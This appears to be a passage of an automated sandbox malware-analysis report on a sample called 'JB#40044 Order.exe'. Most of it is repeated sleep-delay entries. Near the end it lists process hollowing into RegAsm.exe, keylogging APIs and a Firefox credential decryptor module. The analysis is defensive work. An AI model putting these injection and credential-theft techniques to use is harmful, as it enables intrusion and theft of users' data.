                Source: C:\Users\user\Desktop\JB#40044 Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597645Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594791Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1587Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597645s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597516s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -596031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -595016s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -594906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -594791s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -594562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7712Thread sleep time: -594453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597645Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594791Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594453Jump to behavior
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4099019610.0000000006711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: RegAsm.exe, 00000001.00000002.4093095692.0000000001591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017BC168 LdrInitializeThunk,LdrInitializeThunk,1_2_017BC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: JB#40044 Order.exe, stubb.csReference to suspicious API methods: BaseApp.ReadProcessMemory(processHandle, address, ref baseAddress, 4, ref bytesRead)
                Source: JB#40044 Order.exe, stubb.csReference to suspicious API methods: BaseApp.VirtualAllocEx(processHandle, imageBase, size, 12288, 64)
                Source: JB#40044 Order.exe, stubb.csReference to suspicious API methods: BaseApp.WriteProcessMemory(Config.processInfo.ProcessHandle, newImageBase + num3, array, array.Length, ref bytesWritten)
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 118D008Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdZq
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|(h
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd:S
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHD1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<K`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$}i
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(#J
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP1o
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`2X
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@4;
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX"P
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXBn
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8f/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\)_
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qprt
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\lG
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4=B
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q($S
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhCW
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q04[
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh!y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@UE
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpTK
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4\t
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|lY
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\v
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxC7
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<-7
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qz2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<MU
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD]]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(%?
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlkp
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP3d
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlKR
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt[Z
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHE:
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTZ?
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHAP
